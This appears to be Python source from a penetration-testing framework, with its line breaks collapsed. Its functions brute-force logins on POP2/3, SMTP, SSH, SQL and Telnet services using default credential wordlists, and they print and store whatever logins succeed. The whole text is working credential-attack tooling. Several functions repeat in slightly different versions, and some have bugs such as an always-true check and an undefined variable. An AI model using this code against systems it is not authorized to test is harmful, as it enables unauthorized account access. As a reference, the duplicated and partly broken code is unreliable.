def popbrute(web): #print(R+'\n ===================================') #print(R+'\n P O P 2/3 B R U T E F O R C E R') #print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›·——·‹›\n') from core.methods.print import pbrute pbrute("POP2/3") try: print(GR + ' [*] Testing target...') time.sleep(0.5) ip = socket.gethostbyname(web) m = input(O + ' [§] Use IP ' + R + str(ip) + O + '? (y/n) :> ') if m == 'y' or m == 'Y': pass elif m == 'n' or m == 'N': ip = input(O + ' [§] Enter IP :> ') print(G + ' [+] Target appears online...\n') print(O + ' Choose the port number :\n') print(C + ' PORT PROTOCOL') print(C + ' ==== ========') print(B + ' 109 POP2') print(B + ' 110 POP3') port = input(GR + '\n [§] Enter the port :> ') pop = poplib.POP3(ip, int(port)) print(GR + ' [*] Using default credentials...') time.sleep(0.6) print(O + ' [!] Importing file paths...') time.sleep(0.8) try: with open('files/brute-db/pop/pop_defuser.lst', 'r') as users: for u in users: u = u.strip('\n') popuser.append(u) with open('files/brute-db/pop/pop_defpass.lst', 'r') as pas: for p in pas: p = p.strip('\n') poppass.append(p) except IOError: print(R + ' [-] Importing wordlist failed!') for user in popuser: for password in poppass: try: pop.user(str(user)) pop.pass_(password) if True: print(G + ' [!] Successful login with ' + O + user + G + ' and ' + O + password) break except: print(C + ' [!] Checking ' + B + user + C + ' and ' + B + password + '...') except: print(R + ' [-] Target seems to be down!')
def smtpbrute(web): global name name = targetname(web) global lvl2 lvl2 = inspect.stack()[0][3] global module module = "VulnAnalysis" global lvl1 lvl1 = "Brute Force Tools" global lvl3 lvl3 = "" time.sleep(0.6) #print(R+' =====================') #print(R+'\n S M T P B R U T E ') #print(R+' ---<>----<>----<>----\n') from core.methods.print import pbrute pbrute("smtp") try: with open('files/brute-db/smtp/smtp_defuser.lst') as users: for user in users: user = user.strip('\n') smtpuser.append(user) with open('files/brute-db/smtp/smtp_defpass.lst') as passwd: for passw in passwd: passw = passw.strip('\n') smtppass.append(passw) except IOError: print(R + ' [-] File paths not found!') web = web.replace('https://', '') web = web.replace('http://', '') ip = socket.gethostbyname(web) w = input(O + ' [§] Use IP ' + R + ip + ' ? (y/n) :> ') if w == 'y' or w == 'Y': port = input(O + ' [§] Enter the port (eg. 25, 587) :> ') delay = input(C + ' [§] Delay between each request (eg. 0.2) :> ') print(B + ' [*] Initiating module...') time.sleep(1) print(GR + ' [*] Trying using default credentials...') smtpBrute0x00(ip, smtpuser, smtppass, port, delay) elif w == 'n' or w == 'N': ip = input(O + ' [§] Enter IP :> ') port = input(O + ' [§] Enter the port (eg. 25, 587) :> ') delay = input(C + ' [§] Delay between each request (eg. 0.2) :> ') print(B + ' [*] Initiating module...') time.sleep(1) print(GR + ' [*] Trying using default credentials...') smtpBrute0x00(ip, smtpuser, smtppass, port, delay) else: print(R + ' [-] Sorry fam you typed shit!') sleep(0.7) print(G + ' [+] Done!')
def sshbrute(web): #print(R+'\n ===============================') #print(R+'\n S S H B R U T E F O R C E R') #print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·——·‹›·–\n') from core.methods.print import pbrute pbrute("ssh") try: print(GR + ' [*] Testing target...') ip = socket.gethostbyname(web) m = input(O + ' [#] Use IP ' + R + str(ip) + O + '? (y/n) :> ') if m == 'y' or m == 'Y': pass elif m == 'n' or m == 'N': ip = input(O + ' [#] Enter IP :> ') print(G + ' [+] Target appears online...') port = input(GR + ' [#] Enter the port (eg. 22) :> ') try: with open('files/brute-db/ssh/ssh_defuser.lst', 'r') as users: for u in users: u = u.strip('\n') sshuser.append(u) with open('files/brute-db/ssh/ssh_defpass.lst', 'r') as pas: for p in pas: p = p.strip('\n') sshpass.append(p) except IOError: print(R + ' [-] Importing wordlist failed!') for user in sshuser: for password in sshpass: try: connect = pxssh.pxssh() connect.login(ip, str(user), password) if True: print(G + ' [!] Successful login with ' + O + user + G + ' and ' + O + password) break except: print(C + ' [!] Checking ' + B + user + C + ' and ' + B + password + '...') except: print(R + ' [-] Target seems to be down!') print(G + " [+] Done!")
def smtpbrute(web): print(GR + ' [*] Loading module...\n') time.sleep(0.6) #print(R+' =====================') #print(R+'\n S M T P B R U T E ') #print(R+' ——·‹›·––·‹›·——·‹›·——·\n') from core.methods.print import pbrute pbrute("smtp") try: with open('files/brute-db/smtp/smtp_defuser.lst') as users: for user in users: user = user.strip('\n') smtpuser.append(user) with open('files/brute-db/smtp/smtp_defpass.lst') as passwd: for passw in passwd: passw = passw.strip('\n') smtppass.append(passw) except IOError: print(R + ' [-] File paths not found!') web = web.replace('https://', '') web = web.replace('http://', '') ip = socket.gethostbyname(web) w = input(O + ' [#] Use IP ' + R + ip + ' ? (y/n) :> ') if w == 'y' or w == 'Y': port = input(O + ' [#] Enter the port (eg. 25, 587) :> ') delay = input(C + ' [#] Delay between each request (eg. 0.2) :> ') print(B + ' [*] Initiating module...') time.sleep(1) print(GR + ' [*] Trying using default credentials...') smtpBrute0x00(ip, smtpuser, smtppass, port, delay) elif w == 'n' or w == 'N': ip = input(O + ' [#] Enter IP :> ') port = input(O + ' [#] Enter the port (eg. 25, 587) :> ') delay = input(C + ' [#] Delay between each request (eg. 0.2) :> ') print(B + ' [*] Initiating module...') time.sleep(1) print(GR + ' [*] Trying using default credentials...') smtpBrute0x00(ip, smtpuser, smtppass, port, delay) else: print(R + ' [-] Sorry fam you typed shit!') sleep(0.7) print(G + ' [+] Done!')
def sqlbrute(web): #print(R+'\n ===============================') #print(R+'\n S Q L B R U T E F O R C E R') #print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·——·‹›·–\n') from core.methods.print import pbrute pbrute("sql") try: print(GR + ' [*] Testing target...') ip = socket.gethostbyname(web.split('//')[1]) m = input(O + ' [#] Use IP ' + R + str(ip) + O + '? (y/n) :> ') if m == 'y' or m == 'Y': pass elif m == 'n' or m == 'N': ip = input(O + ' [#] Enter IP :> ') print(G + ' [+] Target appears online...') try: with open('files/brute-db/sql/sql_defuser.lst', 'r') as users: for u in users: u = u.strip('\n') sqluser.append(u) with open('files/brute-db/sql/sql_defpass.lst', 'r') as pas: for p in pas: p = p.strip('\n') sqlpass.append(p) except IOError: print(R + ' [-] Importing wordlist failed!') for user in sqluser: for password in sqlpass: print(C + ' [!] Checking ' + B + user + C + ' and ' + B + password + '...') res = bruter(user, password, ip) if res: print(G + ' [!] Successful login with ' + O + user + G + ' and ' + O + password) break else: continue break except socket.gaierror: print(R + ' [-] Target seems to be down!')
def telnetbrute(web): print(GR + ' [*] Loading module...\n') time.sleep(0.6) #print(R+' =========================') #print(R+'\n T E L N E T B R U T E ') #print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·–\n') from core.methods.print import pbrute pbrute("telnet") with open('files/brute-db/telnet/telnet_defuser.lst') as users: for user in users: user = user.strip('\n') teluser.append(user) with open('files/brute-db/telnet/telnet_defpass.lst') as users: for passw in users: passw = passw.strip('\n') telpass.append(passw) web = web.replace('https://', '') web = web.replace('http://', '') ip = socket.gethostbyname(web) w = input(O + ' [§] Use IP ' + R + ip + ' ? (y/n) :> ') if w == 'y' or w == 'Y': port = input(O + ' [§] Enter the port (eg.23) :> ') delay = input(C + ' [§] Delay between each request (eg. 0.2) :> ') print(B + ' [*] Initiating module...') time.sleep(1) print(GR + ' [*] Trying using default credentials...') telnetBrute0x00(ip, teluser, telpass, port, delay) elif w == 'n' or w == 'N': ip = input(O + ' [§] Enter IP :> ') port = input(O + ' [§] Enter the port (eg.23) :> ') delay = input(C + ' [§] Delay between each request (eg. 0.2) :> ') print(B + ' [*] Initiating module...') time.sleep(1) print(GR + ' [*] Trying using default credentials...') telnetBrute0x00(ip, teluser, telpass, port, delay) else: print(R + ' [-] Sorry fam you typed shit!') sleep(0.7) print(G + ' [+] Done!')
def popbrute(web): global name name = targetname(web) global lvl2 lvl2 = inspect.stack()[0][3] global module module = "VulnAnalysis" global lvl1 lvl1 = "Brute Force Tools" global lvl3 lvl3 = "" #print(R+'\n ===================================') #print(R+'\n P O P 2/3 B R U T E F O R C E R') #print(R+' ---<>----<>----<>----<>----<>----<>\n') from core.methods.print import pbrute pbrute("POP2/3") try: print(GR + ' [*] Testing target...') time.sleep(0.5) ip = socket.gethostbyname(web) m = input(O + ' [§] Use IP ' + R + str(ip) + O + '? (y/n) :> ') if m == 'y' or m == 'Y': pass elif m == 'n' or m == 'N': ip = input(O + ' [§] Enter IP :> ') print(G + ' [+] Target appears online...\n') print(O + ' Choose the port number :\n') print(C + ' PORT PROTOCOL') print(C + ' ==== ========') print(B + ' 109 POP2') print(B + ' 110 POP3') port = input(GR + '\n [§] Enter the port :> ') pop = poplib.POP3(ip, int(port)) print(GR + ' [*] Using default credentials...') time.sleep(0.6) print(O + ' [!] Importing file paths...') time.sleep(0.8) try: with open('files/brute-db/pop/pop_defuser.lst', 'r') as users: for u in users: u = u.strip('\n') popuser.append(u) with open('files/brute-db/pop/pop_defpass.lst', 'r') as pas: for p in pas: p = p.strip('\n') poppass.append(p) except IOError: print(R + ' [-] Importing wordlist failed!') found = False for user in popuser: for password in poppass: try: pop.user(str(user)) pop.pass_(password) if True: found = True print(G + ' [!] Successful login with ' + O + user + G + ' and ' + O + password) data = username + " : " + password save_data(database, module, lvl1, lvl2, lvl3, name, data) break except KeyboardInterrupt: if not found: data = "Nothing found." save_data(database, module, lvl1, lvl2, lvl3, name, data) sys.exit(1) except Exception: print(C + ' [!] Checking ' + B + user + C + ' and ' + B + password + '...') if not found: data = "Nothing found." save_data(database, module, lvl1, lvl2, lvl3, name, data) except Exception: print(R + ' [-] Target seems to be down!')
def sshbrute(web): global name name = targetname(web) global lvl2 lvl2 = inspect.stack()[0][3] global module module = "VulnAnalysis" global lvl1 lvl1 = "Brute Force Tools" global lvl3 lvl3 = "" #print(R+'\n ===============================') #print(R+'\n S S H B R U T E F O R C E R') #print(R+' ---<>----<>----<>----<>----<>--\n') from core.methods.print import pbrute pbrute("ssh") try: print(GR + ' [*] Testing target...') ip = socket.gethostbyname(web) m = input(O + ' [§] Use IP ' + R + str(ip) + O + '? (y/n) :> ') if m == 'y' or m == 'Y': pass elif m == 'n' or m == 'N': ip = input(O + ' [§] Enter IP :> ') print(G + ' [+] Target appears online...') port = input(GR + ' [§] Enter the port (eg. 22) :> ') try: with open('files/brute-db/ssh/ssh_defuser.lst', 'r') as users: for u in users: u = u.strip('\n') sshuser.append(u) with open('files/brute-db/ssh/ssh_defpass.lst', 'r') as pas: for p in pas: p = p.strip('\n') sshpass.append(p) except IOError: print(R + ' [-] Importing wordlist failed!') found = False for user in sshuser: for password in sshpass: try: connect = pxssh.pxssh() connect.login(ip, str(user), password) if True: found = True data = user + " : " + password save_data(database, module, lvl1, lvl2, lvl3, name, data) print(G + ' [!] Successful login with ' + O + user + G + ' and ' + O + password) break except Exception: print(C + ' [!] Checking ' + B + user + C + ' and ' + B + password + '...') if not found: data = "Nothing found." save_data(database, module, lvl1, lvl2, lvl3, name, data) except KeyboardInterrupt: if not found: data = "Nothing found." save_data(database, module, lvl1, lvl2, lvl3, name, data) except Exception: print(R + ' [-] Target seems to be down!') print(G + " [+] Done!")